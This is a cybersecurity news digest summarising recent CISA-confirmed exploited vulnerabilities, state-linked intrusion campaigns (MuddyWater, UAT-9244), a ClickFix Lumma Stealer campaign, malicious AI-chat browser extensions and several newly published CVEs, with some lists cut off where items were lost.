Originally reported by The Hacker News, Microsoft Security, SANS ISC, MSRC Security Updates
TL;DR
CISA confirmed active exploitation of critical vulnerabilities in Hikvision cameras and Rockwell automation systems. Meanwhile, Iranian MuddyWater hackers target US organizations with new Dindoor backdoor, and Chinese APT UAT-9244 deploys sophisticated implants against South American telecommunications infrastructure.
CISA added two critical CVSS 9.8 vulnerabilities to the KEV catalog with confirmed active exploitation, indicating immediate threat to organizations.
CISA added two critical-severity vulnerabilities to its Known Exploited Vulnerabilities catalog, confirming active exploitation in the wild. The flaws affect widely-deployed industrial and surveillance systems:
CVE-2017-7921 (CVSS 9.8): Improper authentication vulnerability in Hikvision IP camerasThe KEV additions mandate federal agencies patch these vulnerabilities immediately, signaling confirmed exploitation across enterprise environments.
Broadcom's Symantec and Carbon Black Threat Hunter Team discovered Iranian state-sponsored group MuddyWater (Seedworm) embedding themselves in multiple US organizational networks. The campaign targets banks, airports, non-profits, and the Israeli arm of a software company using a newly identified backdoor called Dindoor.
The intrusions demonstrate MuddyWater's continued focus on long-term persistence within critical infrastructure and financial sector networks.
Cisco Talos identified China-linked APT group UAT-9244 conducting sustained attacks against telecommunications infrastructure across South America since 2024. The group, closely associated with FamousSparrow, deployed three distinct implants:
The campaign specifically targets critical telecommunications infrastructure, indicating potential supply chain and communications interception objectives.
Microsoft disclosed a widespread ClickFix social engineering campaign observed in February 2026 that leverages Windows Terminal to deploy Lumma Stealer malware. The attack chain represents an evolution from previous ClickFix campaigns that relied on Windows Run dialog commands.
The technique exploits user trust in legitimate Windows applications to execute malicious payloads, demonstrating attackers' adaptation to security awareness training focused on suspicious PowerShell execution.
Microsoft Security identified malicious AI assistant browser extensions that collected chat histories from ChatGPT, DeepSeek, and other LLM platforms. The campaign achieved nearly 900,000 installs across more than 20,000 enterprise tenants.
The extensions specifically targeted:
This attack vector highlights emerging risks as organizations integrate AI tools into workflows without adequate browser extension security controls.
Microsoft published multiple CVE entries affecting various components:
CVE-2026-23651: Microsoft ACI Confidential Containers privilege escalation via permissive regex in Azure Compute GalleryCVE-2026-21536: Microsoft Devices Pricing Program remote code execution vulnerabilityCVE-2026-23865: Integer overflow in FreeType library affecting OpenType variable fontsCVE-2026-3338: PKCS7_verify signature validation bypass in AWS-LCCVE-2026-24821: Heap buffer over-read in WickedEngine Lua compilerCVE-2026-23235: Out-of-bounds access in f2fs sysfs attribute handlingOriginally reported by The Hacker News, Microsoft Security, SANS ISC, MSRC Security Updates